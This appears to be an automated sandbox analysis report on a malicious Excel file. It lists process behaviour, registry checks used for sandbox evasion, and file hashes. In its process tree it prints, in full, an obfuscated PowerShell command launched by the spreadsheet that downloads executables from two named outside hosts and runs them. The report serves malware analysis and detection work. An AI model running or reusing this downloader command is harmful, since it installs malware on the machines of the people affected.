Analysis
max time kernel: 46s
max time network: 43s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-07-2024 22:25
Behavioral task: behavioral1
Sample: 99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls
Resource: win7-20240704-en

Behavioral task: behavioral2
Sample: 99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls
Resource: win10v2004-20240709-en
General
Target: 99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls
Size: 52KB
MD5: 86f2a9879de336b1c983755b2615f926
SHA1: 19250c71f3eb28a6b4e3febef6dfa47a30e3342e
SHA256: 99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4
SHA512: d37da87e8a2e65b17f138540283e005b68016c7a2688889f621858b06cf1362cab8d21a91a4e99c47b87ec996e31c1813a389f45418eee45f91620800e987bcc
SSDEEP: 1536:0fxEtjPOtioVjDGUU1qfDlaGGx+cMdg6boobYGF7:0fxEtjPOtioVjDGUU1qfDlaGGx+cMdgw
Malware Config
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 5412 | 2496 | CMd.exe | 83

Blocklisted process makes network request (1 IoC)
flow | pid | Process
19 | 5532 | powershell.exe

Command and Scripting Interpreter: PowerShell (signature name as listed for PID 5532 in the process tree below)
pid | Process
5532 | powershell.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoC)
pid | Process
2496 | EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid | Process
5532 | powershell.exe
5532 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
description | pid | Process
Token: SeDebugPrivilege | 5532 | powershell.exe

Suspicious use of SetWindowsHookEx (12 IoCs)
pid | Process
2496 | EXCEL.EXE (12 identical rows)

Suspicious use of WriteProcessMemory (4 IoCs)
description | pid | Process | procid_target
PID 2496 wrote to memory of 5412 | 2496 | EXCEL.EXE | 88
PID 2496 wrote to memory of 5412 | 2496 | EXCEL.EXE | 88
PID 5412 wrote to memory of 5532 | 5412 | CMd.exe | 91
PID 5412 wrote to memory of 5532 | 5412 | CMd.exe | 91
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls"
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID: 2496

  C:\Windows\SYSTEM32\CMd.exe (child of PID 2496)
  Command line: CMd.exe /c "p^ow^Ers^hel^l^.e^xe^ -nO^l -No^Ni^Nt^ -W^IndOws^ 1 -NoprOFIle^ -ex^Ec^u B^Ypa^S^s -Wi^ 1 -N^O^Pr^ $random = N^ew-^O^b^je^ct^ Sy^st^em.^Ran^do^m; Fo^rea^ch($um in @({http://cizijazykyhrou.cz/ama.exe},{http://biwebdisseny.com/eco.exe})) { t^ry { $fg = $ra^n^do^m.n^e^xt(0, 61132); $pp = '%appdata%\' + $fg + '.exe'; ^(^ne^w-^ob^jec^t s^ys^t^e^m.ne^t^.webcli^en^t)^.D^ow^nl^o^ad^Fi^le($um.ToString(), $pp); St^a^rt-^Pr^oce^ss $pp; b^re^ak; } c^at^ch { Wr^it^e-Ho^st $err^or[0].E^x^cep^ti^on } }"
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID: 5412

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 5412)
    Command line: powErshell.exe -nOl -NoNiNt -WIndOws 1 -NoprOFIle -exEcu BYpaSs -Wi 1 -NOPr $random = New-Object System.Random; Foreach($um in @({http://cizijazykyhrou.cz/ama.exe},{http://biwebdisseny.com/eco.exe})) { try { $fg = $random.next(0, 61132); $pp = 'C:\Users\Admin\AppData\Roaming\' + $fg + '.exe'; (new-object system.net.webclient).DownloadFile($um.ToString(), $pp); Start-Process $pp; break; } catch { Write-Host $error[0].Exception } }
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 5532
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 156B
MD5: 6ef02398f62dba21a714f594f1b41c0c
SHA1: 35ff956a403f991440678410da9d62b6af356458
SHA256: ebb8bb04e30b3a5e04c087a9e7fca556b76961b42433e52473be40e73afa9cd0
SHA512: 4758938d0602747b811a8a1e630b9e8a43893ce5e97f73824e627b4c75f6247f4918ccc139cdd148e5ceaaec4b8b58cece67f1f04f5c549fcb140b7e0feb3f14

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize: 3KB
MD5: 966172937f36170dafbef1c27fa60cde
SHA1: 4f49c6ecbb49816cef1c807b6b2054d5f7d223c8
SHA256: 53f4639259085152efcc17392f978db52e7ae473830b2ad317479ffe6fb1c17a
SHA512: f4cf0d3172d455fdb247fcf871b57e14343c91a536c17690fe234e2a4a07a42cd326e63fe06c0d247bc388a678ee06680e5c28e7257ef31ceebf16edf15af571